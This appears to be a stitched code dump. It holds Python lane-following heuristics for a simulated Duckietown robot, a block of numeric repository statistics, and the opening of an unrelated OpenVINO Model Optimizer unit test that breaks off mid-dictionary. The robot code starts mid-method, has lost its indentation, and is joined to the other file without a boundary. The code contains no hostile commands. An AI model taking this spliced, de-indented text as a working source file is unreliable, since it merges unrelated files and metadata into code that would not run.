# if white_b_r < 0.001:
# # stuck to the left side...
# self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 13
# return self.buffer.pop()
if yellow_b_l > 0.02 and white_b_l < 0.0001 and white_b_r > 0.0001:
# consider the middle boy
if yellow_b_s > 0.001:
# oof
# if psa >= 1:
# self.buffer = [[]]
if psa > 0.25:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8 + [[-self.stop_speed(0.35), 0]]
else:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 10 + [[-self.stop_speed(0.35), 0]]
return self.buffer.pop()
# between 2 lanes alr
self.middle = True
if steerer > 0:
return [self.stop_speed(0.44), 1]
else:
return [self.stop_speed(0.44), -1]
elif yellow_b_l > 0.02 and white_b_l < 0.0001 and white_b_r <= 0.0001:
if psa > 0.5:
# between 2 lanes, a bit close to left lane
# self.middle = True
return [self.stop_speed(0.44), steerer]
else:
# slope too small
if yellow_b_s < 0.1:
return [0.1, 1]
elif psa > 0 and psa < 0.1:
# self.middle = True
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
return self.buffer.pop()
elif psa > 0 and psa < 0.2:
# self.middle = True
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
return self.buffer.pop()
elif psa > 0:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 4
return self.buffer.pop()
return [0.1, -1]
# self.buffer = [[0.35, -1]] *20 + [[0.44, 0]] * 5
# return self.buffer.pop()
elif yellow_b_l > 0.02 and white_b_r > 0.02 and yellow_b_r > 0.02:
# definitely grass on the right
return [self.stop_speed(0.44), 1]
elif yellow_b_l <= 0.02:
if yellow_b_r > 0.02 and white_b_r > 0.02:
if white_b_l < 0.02:
# prolly the grass
# turn to the left to find out more
return [0.1, 1]
else:
# kinda freakish
# let's backdown
return [-self.stop_speed(0.44), 0]
if white_b_l > 0.02 and white_b_r > 0.02:
# cheeky
# in front could be the grass
# but it could also be facing the edge
# false edges may be detected, so let's back down a bit
return [-self.stop_speed(0.44), 0]
if white_b_r > 0.02:
return [self.stop_speed(0.44), 1]
if white_b_l > 0.02 and yellow_b_r > 0.02:
# oh boy, we're reverse
# let's turn around madly
# welp, based on the slopes!
if pos_slope_avg is not None and pos_slope_avg < 0.6:
# positive slope is quite low
# let's back down once for safety and turn right
self.buffer = [[0.1, -1]] * 20 + [[-self.stop_speed(0.44), 0]]
return [-self.stop_speed(0.44), 0]
# By default, just turn right madly, should be safe
self.buffer = [[0.1, -1]] * 19
return [0.1, -1]
if white_b_l > 0.02 and yellow_b_r <= 0.02:
# it's kinda hard to tell
# if there's a lot of white on the left, then it shouldn't be the yellow lane
# just turn right to identify where the yellow lane is
return [0.1, -1]
return [0.1, 1]
else: # plenty of yellow on the left
# If there's lots of white-gray on the left, it's the grass
# If not, highly likely that it's the yellow lane
# Anyhow, turn right to find more information
return [0.1, -1]
if self.intersection:
red_bar, red_bar_pos = has_red_bar(image)
if red_bar and red_bar_pos == 'top':
self.turn_right_incoming = self.turn_left_incoming = False
return [self.stop_speed(0.44), steerer]
if red_bar and red_bar_pos == 'mid':
self.turn_right_incoming = self.turn_left_incoming = False
return [self.stop_speed(0.44), steerer]
if red_bar and red_bar_pos == 'bot':
self.turn_right_incoming = self.turn_left_incoming = False
self.middle = False
self.passing_intersection = True
if self.remaining_steps_of_slow > 0:
self.buffer = [[0.1, 0]] * 100
return [0.1, 0]
else:
self.buffer = [[self.stop_speed(0.44), 0]] * 16
return [self.stop_speed(0.44), steerer]
# On track to turn left
if self.turn_left_incoming:
if yellow_b_r > 0.001:
# sth wrong
self.turn_left_incoming = False
return [0.1, -1]
if white_b_l > 0.01:
return [0.1, 1]
if yellow_b_l <= 0.02:
return [self.stop_speed(0.35), 1]
if (neg_slope_avg is not None and neg_slope_avg <= -0.6) \
or pos_slope_avg is not None:
# If we turn left, eventually the bot will find a high enuf slope on the right side
# or we see the positive slopes!
self.turn_left_incoming = False
# self.middle = False
return [self.stop_speed(0.44), 0]
# On track to turn right
# Only start to turn once you can't see the yellow lane
if self.turn_right_incoming:
if yellow_b_l < 0.02 and yellow_b_s < 0.1:
# something's wrong
self.turn_right_incoming = False
return [self.stop_speed(0.35), 1]
if yellow_b_s < 0.15 or white_b_r > 0.01:
# still seeing lots of yellow lane to pass thru
return [self.stop_speed(0.44), 0]
if psa > 0 and psa < 0.2:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
else:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
# self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
self.turn_right_incoming = False
# self.middle = False
return self.buffer.pop()
# if self.turning_right:
# if yellow_b_r < 0.01 and ((pos_slope_avg is not None and pos_slope_avg >= 0.65) \
# or neg_slope_avg is not None):
# # If we turn right, eventually the bot will find a high enuf slope on the right side
# # or we see the negative slopes!
# self.turn_right_incoming = self.turning_right = False
# self.turn_right_prep = -1
# # self.middle = False
# if yellow_b_s < 0.1 and abs(yellow_b_r - yellow_b_l) < 0.01:
# self.buffer = [[0.1, -1]] * 20
# return self.buffer.pop()
# if self.alt:
# self.alt = False
# # return [self.stop_speed(0.35), -1]
# return [0.35, -1]
# else:
# self.alt = True
# return [0.1, 0]
# if white_b_r > 0.01 or (yellow_b_l > 0.01 and yellow_b_r < 0.03):
# if self.turn_right_prep < 0:
# self.turn_right_prep = 3
# st = self.turn_right_prep_angles[self.turn_right_prep]
# self.turn_right_prep -= 1
# return [self.stop_speed(0.44), st]
# self.turning_right = True
# return [0.35, -1]
# if white_b_r <= 0.01:
# # A bit of hack here
# # Turning right is easy to 'die' so alternate btw turning and step slightly forward
# if yellow_b_l > 0.015 and yellow_b_r > 0.015 \
# and max_g_b_l >= max_g_b_r:
# # return [-0.35, -1]
# return [0.1, -1]
# # if max_g_b_r > 177:
# # return [self.stop_speed(0.44), 1]
# if self.alt:
# self.alt = False
# # return [self.stop_speed(0.35), -1]
# return [0.35, -1]
# else:
# self.alt = True
# return [0.1, 0]
# if (pos_slope_avg is not None and pos_slope_avg >= 0.65) \
# or neg_slope_avg is not None:
# # If we turn right, eventually the bot will find a high enuf slope on the right side
# # or we see the negative slopes!
# self.turn_right_incoming = False
# return [self.stop_speed(0.44), 0]
# Duckie the bot is in the middle of 2 lanes
# Duckie is not expecting any turns
# Expecting standard situations
if pos_slope_avg is not None and neg_slope_avg is not None:
if pos_slope_avg >= 0.65 and neg_slope_avg <= -0.6:
return [self.stop_speed(0.8), steerer]
if pos_slope_avg < 0.65 and neg_slope_avg <= -0.6 :
# Found a right curve here
# Believe Duckie will turn right in the future
self.turn_right_incoming = True
if neg_slope_avg > -0.6:
# Found a left curve here
# Believe Duckie will turn left in the future
self.turn_left_incoming = True
if yellow_b_l < 0.02:
return [self.stop_speed(0.8), 1]
if white_b_r < 0.02:
return [self.stop_speed(0.8), -1]
return [self.stop_speed(0.8), 0]
if pos_slope_avg is not None:
if pos_slope_avg < 0.5 and neg_slope_avg is None:
# Found a right curve here
# Believe Duckie will turn right in the future
self.turn_right_incoming = True
if white_b_r > 0.02:
return [self.stop_speed(0.8), steerer]
else:
return [self.stop_speed(0.44), steerer]
if neg_slope_avg is not None:
if neg_slope_avg > -0.6:
# Found a left curve here
# Believe Duckie will turn left in the future
self.turn_left_incoming = True
if white_b_r > 0.02:
return [self.stop_speed(0.8), steerer]
else:
return [self.stop_speed(0.44), steerer]
return [self.stop_speed(0.44), steerer]
def predict5(self, rgb_array=None, raw_obs=None):
print("Status ",self.turn_left_incoming, self.turn_right_incoming, self.middle)
if rgb_array is None:
return [0, 0]
image = np.array(rgb_array)
if self.buffer != []:
action = self.buffer.pop()
if self.stop_sign and raw_obs is not None:
self.detect_stop(raw_obs)
return action
# For maps with pits
if self.has_pit and is_pit(rgb_array, 100, 200, 699, 399) > 0.9:
self.buffer = [[0.1, 1.0]] * 62
self.middle = False
return [0.1, 1.0]
# For maps with stop signs
if self.stop_sign and raw_obs is not None:
self.detect_stop(raw_obs)
lines, pos_slope_avg, neg_slope_avg = detect_lane(rgb_array=image)
print("Slopes ", pos_slope_avg, neg_slope_avg)
if lines is []:
return [1.0, 1]
if pos_slope_avg is None:
psa = 0
else:
psa = pos_slope_avg
if neg_slope_avg is None:
nsa = 0
else:
nsa = neg_slope_avg
steerer = abs(nsa) - psa
if steerer < 0:
steerer = max(steerer, -1)
if steerer > 0:
steerer = min(steerer, 1)
# if nsa != 0 and psa != 0:
# steerer = abs(nsa) - psa
# else:
# steerer = 0
# Bot-left
yellow_b_l, white_b_l, max_g_b_l = inspect_box(image, 0, 300, 399, 599)
# Bot-right
yellow_b_r, white_b_r, max_g_b_r = inspect_box(image, 400, 300, 799, 599)
# Bottom stripe
yellow_b_s, white_b_s, max_g_b_s = inspect_box(image, 200, 500, 599, 599)
print("Yellows ", yellow_b_l, yellow_b_s, yellow_b_r)
print("Whites ", white_b_l, white_b_s, white_b_r)
print("Max green vals ", max_g_b_l, max_g_b_s, max_g_b_r)
# Big assumption of intersection: Always have either left or forward
if self.passing_intersection:
if white_b_l > 0.01 and white_b_r > 0.01:
# approaching the sideway, have to turn left
if self.remaining_steps_of_slow > 0:
fwd_steps = [[0.1, 0]] * 50
buf_steps = [[0.1, 0]] * 10
self.remaining_steps_of_slow = 10
else:
fwd_steps = [[0.44, 0]] * 16
buf_steps = [[0.44, 0]] * 3
self.buffer = fwd_steps + [[0.1, 1]] * 30 + buf_steps
self.passing_intersection = False
return self.buffer.pop()
# okay, can go forward
if self.remaining_steps_of_slow > 0:
fwd_steps = [[0.1, 0]] * 50
self.remaining_steps_of_slow = 0
else:
fwd_steps = [[0.44, 0]] * 16
self.buffer = fwd_steps
self.passing_intersection = False
return self.buffer.pop()
# Find lanes
if not self.middle:
# return [-self.stop_speed(0.44), 0]
# if self.intersection:
# if white_b_l < 0.001:
# if white_b_r < 0.001:
# self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
# return self.buffer.pop()
# if white_b_l > 0.01:
# if white_b_r < 0.001:
# # stuck to the left side...
# self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 13
# return self.buffer.pop()
if yellow_b_l > 0.02 and white_b_l < 0.0001 and white_b_r > 0.0001:
# consider the middle boy
if yellow_b_s > 0.001:
# oof
# if psa >= 1:
# self.buffer = [[]]
if psa > 0.25:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8 + [[-self.stop_speed(0.35), 0]]
else:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 10 + [[-self.stop_speed(0.35), 0]]
return self.buffer.pop()
# between 2 lanes alr
self.middle = True
if steerer > 0:
return [self.stop_speed(0.44), 1]
else:
return [self.stop_speed(0.44), -1]
elif yellow_b_l > 0.02 and white_b_l < 0.0001 and white_b_r <= 0.0001:
if psa > 0.5:
# between 2 lanes, a bit close to left lane
# self.middle = True
return [self.stop_speed(0.44), steerer]
elif yellow_b_s < 0.1:
return [0.1, 0]
elif psa < 0.1:
# self.middle = True
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
return self.buffer.pop()
elif psa < 0.2:
# self.middle = True
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
return self.buffer.pop()
elif nsa < 0 and nsa > -0.2:
self.buffer = [[0.1, 0], [0.1, 1], [0.1, 1]] * 8
return self.buffer.pop()
elif nsa < 0 and nsa > -0.1:
self.buffer = [[0.1, 0], [0.1, 1], [0.1, 1]] * 16
return self.buffer.pop()
else:
return [0.1, -1]
# self.buffer = [[0.35, -1]] *20 + [[0.44, 0]] * 5
# return self.buffer.pop()
elif yellow_b_l > 0.02 and white_b_r > 0.02 and yellow_b_r > 0.02:
# definitely grass on the right
return [self.stop_speed(0.44), 1]
elif yellow_b_l <= 0.02:
# if yellow_b_r < 0.001 and yellow_b_l < 0.001:
# # Possibly in the right lane, just need to turn
# self.buffer = [[0.1, 0], [0.1, 1], [0.1, 1]] * int(20 / self.locating_turns)
# self.locating_turns += 1
# return self.buffer.pop()
if yellow_b_r > 0.02 and white_b_r > 0.02:
if white_b_l < 0.02:
# prolly the grass
# turn to the left to find out more
return [0.1, 1]
else:
# kinda freakish
# let's backdown
return [-self.stop_speed(0.44), 0]
if yellow_b_r > 0.02 and white_b_l < 0.02:
return [-self.stop_speed(0.44), 0]
if white_b_l > 0.02 and white_b_r > 0.02:
if white_b_s < 0.01 and psa > 0 and psa < 0.25 and nsa < 0 and nsa > -0.25:
print(psa, nsa)
# in a middle of the curve, let's u-turn
self.buffer = [[0.1, 0], [0.1, 1], [0.1, 1]] * int(20 / self.locating_turns)
self.locating_turns += 1
return self.buffer.pop()
# cheeky
# in front could be the grass
# but it could also be facing the edge
# false edges may be detected, so let's back down a bit
return [-self.stop_speed(0.44), 0]
if white_b_r > 0.02:
return [self.stop_speed(0.44), 1]
if white_b_l > 0.01 and yellow_b_r > 0.01:
# oh boy, we're reverse
# let's turn around madly
# welp, based on the slopes!
if pos_slope_avg is not None and pos_slope_avg < 0.1:
# positive slope is very low
# let's back down once for safety and turn right
self.buffer = [[0.1, -1]] * 30 + [[-self.stop_speed(0.44), 0]] * 3
return self.buffer.pop()
# By default, just turn right madly, should be safe
self.buffer = [[0.1, -1]] * 16
return [0.1, -1]
if white_b_l > 0.02 and yellow_b_r <= 0.02:
# it's kinda hard to tell
# if there's a lot of white on the left, then it shouldn't be the yellow lane
# just turn right to identify where the yellow lane is
return [0.1, -1]
return [0.1, 1]
else: # plenty of yellow on the left
# If there's lots of white-gray on the left, it's the grass
# If not, highly likely that it's the yellow lane
# Anyhow, turn right to find more information
return [0.1, -1]
if self.intersection:
red_bar, red_bar_pos = has_red_bar(image)
if red_bar and red_bar_pos == 'top':
self.turn_right_incoming = self.turn_left_incoming = False
return [self.stop_speed(0.44), steerer]
if red_bar and red_bar_pos == 'mid':
self.turn_right_incoming = self.turn_left_incoming = False
return [self.stop_speed(0.44), steerer]
if red_bar and red_bar_pos == 'bot':
self.turn_right_incoming = self.turn_left_incoming = False
self.middle = False
self.passing_intersection = True
if self.remaining_steps_of_slow > 0:
self.buffer = [[0.1, 0]] * 50
return [0.1, 0]
else:
self.buffer = [[self.stop_speed(0.44), 0]] * 16
return [self.stop_speed(0.44), steerer]
# if white_b_l > 0.01 and white_b_r > 0.01 and white_b_s > 0:
# self.buffer = [[-self.stop_speed(0.44), 1]] * 5
# return [-self.stop_speed(0.44), 1]
# On track to turn left
if self.turn_left_incoming:
if yellow_b_l <= 0.02:
if yellow_b_l <= 0.001:
return [0.1, 1]
return [self.stop_speed(0.35), 1]
if nsa <= -0.6 or pos_slope_avg is not None:
# If we turn left, eventually the bot will find a high enuf slope on the right side
# or we see the positive slopes!
self.turn_left_incoming = False
# self.middle = False
return [self.stop_speed(0.44), 0]
# On track to turn right
# Only start to turn once you can't see the yellow lane
if self.turn_right_incoming:
if yellow_b_l < 0.02 and yellow_b_s < 0.15:
# something's wrong
self.turn_right_incoming = False
return [self.stop_speed(0.35), 1]
if yellow_b_s < 0.15 or white_b_r > 0.01:
# still seeing lots of yellow lane to pass thru
return [self.stop_speed(0.44), 0]
if psa < 0.2:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
else:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
# self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
self.turn_right_incoming = False
# self.middle = False
return self.buffer.pop()
# Duckie the bot is in the middle of 2 lanes
# Duckie is not expecting any turns
# Expecting standard situations
# This is to correct extreme cases
if yellow_b_r > 0.01:
return [0.1, -1]
if yellow_b_l < 0.01:
return [0.1, 1]
if pos_slope_avg is not None and neg_slope_avg is not None:
if pos_slope_avg >= 0.65 and neg_slope_avg <= -0.6:
return [self.stop_speed(0.8), steerer]
if pos_slope_avg < 0.65 and (neg_slope_avg <= -0.6 or yellow_b_l > 0.02):
# Found a right curve here
# Believe Duckie will turn right in the future
self.turn_right_incoming = True
if neg_slope_avg > -0.6 and white_b_r > 0.02:
# Found a left curve here
# Believe Duckie will turn left in the future
self.turn_left_incoming = True
if yellow_b_l < 0.02:
return [self.stop_speed(0.44), 1]
if white_b_r < 0.02:
return [self.stop_speed(0.44), -1]
return [self.stop_speed(0.44), 0]
if pos_slope_avg is not None:
if pos_slope_avg < 0.5 and neg_slope_avg is None:
# Found a right curve here
# Believe Duckie will turn right in the future
self.turn_right_incoming = True
if white_b_r > 0.02:
return [self.stop_speed(0.8), steerer]
else:
return [self.stop_speed(0.44), steerer]
if neg_slope_avg is not None:
if neg_slope_avg > -0.6:
# Found a left curve here
# Believe Duckie will turn left in the future
self.turn_left_incoming = True
if white_b_r > 0.02:
return [self.stop_speed(0.8), steerer]
else:
return [self.stop_speed(0.44), steerer]
return [self.stop_speed(0.44), steerer]
def predict4(self, rgb_array=None, raw_obs=None):
print("Status ",self.turn_left_incoming, self.turn_right_incoming, self.middle)
if rgb_array is None:
return [0, 0]
image = np.array(rgb_array)
if self.buffer != []:
action = self.buffer.pop()
if self.stop_sign and raw_obs is not None:
self.detect_stop(raw_obs)
return action
# For maps with pits
if self.has_pit and is_pit(rgb_array, 100, 200, 699, 399) > 0.9:
self.buffer = [[0.1, 1.0]] * 62
self.middle = False
return [0.1, 1.0]
# For maps with stop signs
if self.stop_sign and raw_obs is not None:
self.detect_stop(raw_obs)
lines, pos_slope_avg, neg_slope_avg = detect_lane(rgb_array=image)
print("Slopes ", pos_slope_avg, neg_slope_avg)
if lines is []:
return [1.0, 1]
if pos_slope_avg is None:
psa = 0
else:
psa = pos_slope_avg
if neg_slope_avg is None:
nsa = 0
else:
nsa = neg_slope_avg
steerer = abs(nsa) - psa
if steerer < 0:
steerer = max(steerer, -1)
if steerer > 0:
steerer = min(steerer, 1)
# if nsa != 0 and psa != 0:
# steerer = abs(nsa) - psa
# else:
# steerer = 0
# Bot-left
yellow_b_l, white_b_l, max_g_b_l = inspect_box(image, 0, 300, 399, 599)
# Bot-right
yellow_b_r, white_b_r, max_g_b_r = inspect_box(image, 400, 300, 799, 599)
# Bottom stripe
yellow_b_s, white_b_s, max_g_b_s = inspect_box(image, 200, 500, 599, 599)
print("Yellows ", yellow_b_l, yellow_b_s, yellow_b_r)
print("Whites ", white_b_l, white_b_s, white_b_r)
print("Max green vals ", max_g_b_l, max_g_b_s, max_g_b_r)
# Big assumption of intersection: Always have either left or forward
if self.passing_intersection:
if white_b_l > 0.01 and white_b_r > 0.01:
# approaching the sideway, have to turn left
if self.remaining_steps_of_slow > 0:
fwd_steps = [[0.1, 0]] * 50
buf_steps = [[0.1, 0]] * 10
self.remaining_steps_of_slow = 10
else:
fwd_steps = [[0.44, 0]] * 16
buf_steps = [[0.44, 0]] * 3
self.buffer = fwd_steps + [[0.1, 1]] * 30 + buf_steps
self.passing_intersection = False
return self.buffer.pop()
# okay, can go forward
if self.remaining_steps_of_slow > 0:
fwd_steps = [[0.1, 0]] * 50
self.remaining_steps_of_slow = 0
else:
fwd_steps = [[0.44, 0]] * 16
self.buffer = fwd_steps
self.passing_intersection = False
return self.buffer.pop()
# Find lanes
if not self.middle:
# return [-self.stop_speed(0.44), 0]
# if self.intersection:
# if white_b_l < 0.001:
# if white_b_r < 0.001:
# self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
# return self.buffer.pop()
# if white_b_l > 0.01:
# if white_b_r < 0.001:
# # stuck to the left side...
# self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 13
# return self.buffer.pop()
if yellow_b_l > 0.02 and white_b_l < 0.0001 and white_b_r > 0.0001:
# consider the middle boy
if yellow_b_s > 0.001:
# oof
# if psa >= 1:
# self.buffer = [[]]
if psa > 0.25:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8 + [[-self.stop_speed(0.35), 0]]
else:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 10 + [[-self.stop_speed(0.35), 0]]
return self.buffer.pop()
# between 2 lanes alr
self.middle = True
if steerer > 0:
return [self.stop_speed(0.44), 1]
else:
return [self.stop_speed(0.44), -1]
elif yellow_b_l > 0.02 and white_b_l < 0.0001 and white_b_r <= 0.0001:
if psa > 0.5:
# between 2 lanes, a bit close to left lane
# self.middle = True
return [self.stop_speed(0.44), steerer]
else:
# slope too small
# if yellow_b_s < 0.1:
# return [0.1, 1]
if psa == 0:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 4
return self.buffer.pop()
elif psa < 0.1:
# self.middle = True
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
return self.buffer.pop()
elif psa < 0.2:
# self.middle = True
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
return self.buffer.pop()
else:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 4
return self.buffer.pop()
# self.buffer = [[0.35, -1]] *20 + [[0.44, 0]] * 5
# return self.buffer.pop()
elif yellow_b_l > 0.02 and white_b_r > 0.02 and yellow_b_r > 0.02:
# definitely grass on the right
return [self.stop_speed(0.44), 1]
elif yellow_b_l <= 0.02:
if yellow_b_r > 0.02 and white_b_r > 0.02:
if white_b_l < 0.02:
# prolly the grass
# turn to the left to find out more
return [0.1, 1]
else:
# kinda freakish
# let's backdown
return [-self.stop_speed(0.44), 0]
if yellow_b_r > 0.02 and white_b_l < 0.02:
return [-self.stop_speed(0.44), 0]
if white_b_l > 0.02 and white_b_r > 0.02:
# cheeky
# in front could be the grass
# but it could also be facing the edge
# false edges may be detected, so let's back down a bit
return [-self.stop_speed(0.44), 0]
if white_b_r > 0.02:
return [self.stop_speed(0.44), 1]
if white_b_l > 0.02 and yellow_b_r > 0.02:
# oh boy, we're reverse
# let's turn around madly
# welp, based on the slopes!
if pos_slope_avg is not None and pos_slope_avg < 0.1:
# positive slope is very low
# let's back down once for safety and turn right
self.buffer = [[0.1, -1]] * 30 + [[-self.stop_speed(0.44), 0]] * 3
return self.buffer.pop()
# By default, just turn right madly, should be safe
self.buffer = [[0.1, -1]] * 16
return [0.1, -1]
if white_b_l > 0.02 and yellow_b_r <= 0.02:
# it's kinda hard to tell
# if there's a lot of white on the left, then it shouldn't be the yellow lane
# just turn right to identify where the yellow lane is
return [0.1, -1]
return [0.1, 1]
else: # plenty of yellow on the left
# If there's lots of white-gray on the left, it's the grass
# If not, highly likely that it's the yellow lane
# Anyhow, turn right to find more information
return [0.1, -1]
if self.intersection:
red_bar, red_bar_pos = has_red_bar(image)
if red_bar and red_bar_pos == 'top':
self.turn_right_incoming = self.turn_left_incoming = False
return [self.stop_speed(0.44), steerer]
if red_bar and red_bar_pos == 'mid':
self.turn_right_incoming = self.turn_left_incoming = False
return [self.stop_speed(0.44), steerer]
if red_bar and red_bar_pos == 'bot':
self.turn_right_incoming = self.turn_left_incoming = False
self.middle = False
self.passing_intersection = True
if self.remaining_steps_of_slow > 0:
self.buffer = [[0.1, 0]] * 50
return [0.1, 0]
else:
self.buffer = [[self.stop_speed(0.44), 0]] * 16
return [self.stop_speed(0.44), steerer]
if white_b_l > 0.01 and white_b_r > 0.01 and white_b_s > 0:
self.buffer = [[-self.stop_speed(0.44), 1]] * 5
return [-self.stop_speed(0.44), 1]
if white_b_l < 0.001 and white_b_r < 0.001 \
and yellow_b_l < 0.001 and yellow_b_r < 0.001 \
and white_b_s < 0.001 and yellow_b_s < 0.001:
self.buffer = [[-self.stop_speed(0.44), 1]] * 5
return [-self.stop_speed(0.44), 1]
# On track to turn left
if self.turn_left_incoming:
if yellow_b_l <= 0.01 or yellow_b_r > 0.01 or white_b_r > 0.001:
return [self.stop_speed(0.35), 1]
if nsa <= -0.6 or pos_slope_avg is not None:
# If we turn left, eventually the bot will find a high enuf slope on the right side
# or we see the positive slopes!
self.turn_left_incoming = False
# self.middle = False
return [self.stop_speed(0.44), 0]
# On track to turn right
# Only start to turn once you can't see the yellow lane
if self.turn_right_incoming:
if yellow_b_l < 0.02 and yellow_b_s < 0.15:
# something's wrong
self.turn_right_incoming = False
return [self.stop_speed(0.35), 1]
if yellow_b_s < 0.15 or white_b_r > 0.01:
# still seeing lots of yellow lane to pass thru
return [self.stop_speed(0.44), 0]
if psa < 0.2:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
else:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
# self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
self.turn_right_incoming = False
# self.middle = False
return self.buffer.pop()
# This is to correct extreme cases
if yellow_b_l < 0.005:
return [0.1, 1]
# Duckie the bot is in the middle of 2 lanes
# Duckie is not expecting any turns
# Expecting standard situations
if pos_slope_avg is not None and neg_slope_avg is not None:
if pos_slope_avg >= 0.65 and neg_slope_avg <= -0.6:
return [self.stop_speed(0.8), steerer]
if pos_slope_avg < 0.65 and (neg_slope_avg <= -0.6 or yellow_b_l > 0.02):
# Found a right curve here
# Believe Duckie will turn right in the future
self.turn_right_incoming = True
if neg_slope_avg > -0.6 and white_b_r > 0.02:
# Found a left curve here
# Believe Duckie will turn left in the future
self.turn_left_incoming = True
if yellow_b_l < 0.02:
return [self.stop_speed(0.44), 1]
if white_b_r < 0.02:
return [self.stop_speed(0.44), -1]
return [self.stop_speed(0.44), 0]
if pos_slope_avg is not None:
if pos_slope_avg < 0.5 and neg_slope_avg is None:
# Found a right curve here
# Believe Duckie will turn right in the future
self.turn_right_incoming = True
if white_b_r > 0.02:
return [self.stop_speed(0.8), 1]
else:
return [self.stop_speed(0.44), 0]
if neg_slope_avg is not None:
if neg_slope_avg > -0.6:
# Found a left curve here
# Believe Duckie will turn left in the future
self.turn_left_incoming = True
if white_b_r > 0.02:
return [self.stop_speed(0.8), steerer]
else:
return [self.stop_speed(0.44), steerer]
return [self.stop_speed(0.44), steerer]
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--filename', default=None)
arg = parser.parse_args()
| 39.232776
| 107
| 0.471979
| 7,944
| 58,653
| 3.303877
| 0.037261
| 0.017831
| 0.016345
| 0.070411
| 0.959308
| 0.951535
| 0.946735
| 0.944182
| 0.940715
| 0.936333
| 0
| 0.076049
| 0.431231
| 58,653
| 1,494
| 108
| 39.259036
| 0.710701
| 0.244267
| 0
| 0.905128
| 0
| 0
| 0.005608
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010256
| false
| 0.021795
| 0.00641
| 0
| 0.255128
| 0.028205
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db51878bb985db494b8c2f165ef4475626cd37d4
| 35,779
|
py
|
Python
|
model-optimizer/mo/middle/passes/fusing/resnet_optimization_test.py
|
JOCh1958/openvino
|
070201feeec5550b7cf8ec5a0ffd72dc879750be
|
[
"Apache-2.0"
] | 1
|
2021-04-06T03:32:12.000Z
|
2021-04-06T03:32:12.000Z
|
model-optimizer/mo/middle/passes/fusing/resnet_optimization_test.py
|
JOCh1958/openvino
|
070201feeec5550b7cf8ec5a0ffd72dc879750be
|
[
"Apache-2.0"
] | 28
|
2021-09-24T09:29:02.000Z
|
2022-03-28T13:20:46.000Z
|
model-optimizer/mo/middle/passes/fusing/resnet_optimization_test.py
|
JOCh1958/openvino
|
070201feeec5550b7cf8ec5a0ffd72dc879750be
|
[
"Apache-2.0"
] | 1
|
2020-08-30T11:48:03.000Z
|
2020-08-30T11:48:03.000Z
|
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
import numpy as np
from mo.front.common.partial_infer.elemental import copy_shape_infer
from mo.front.common.partial_infer.eltwise import eltwise_infer
from mo.middle.passes.fusing.resnet_optimization import stride_optimization
from mo.ops.convolution import Convolution
from mo.ops.pooling import Pooling
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import build_graph
max_elt_lambda = lambda node: eltwise_infer(node, lambda a, b: np.maximum(a, b))
nodes_attributes = {
# Placeholders
'placeholder_1': {'shape': None, 'type': 'Parameter', 'kind': 'op', 'op': 'Parameter'},
'placeholder_1_data': {'value': None, 'shape': None, 'kind': 'data', 'data_type': None},
# Concat1 operation
'eltwise_1': {'type': 'Maximum', 'kind': 'op', 'op': 'Maximum', 'infer': max_elt_lambda},
'eltwise_1_data': {'name': 'eltwise_1_data', 'value': None, 'shape': None, 'kind': 'data'},
# Convolutions
'conv_1': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
'spatial_dims': np.array([2, 3]),
'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
'dilation': np.array([1, 1, 1, 1]),
'batch_dims': np.array([0]), 'infer': Convolution.infer,
'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
'output_feature_channel': 0, },
'conv_1_w': {'value': None, 'shape': None, 'kind': 'data',
'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
'conv_1_b': {'value': None, 'shape': None, 'kind': 'data'},
'conv_1_data': {'value': None, 'shape': None, 'kind': 'data'},
'conv_2': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
'spatial_dims': np.array([2, 3]),
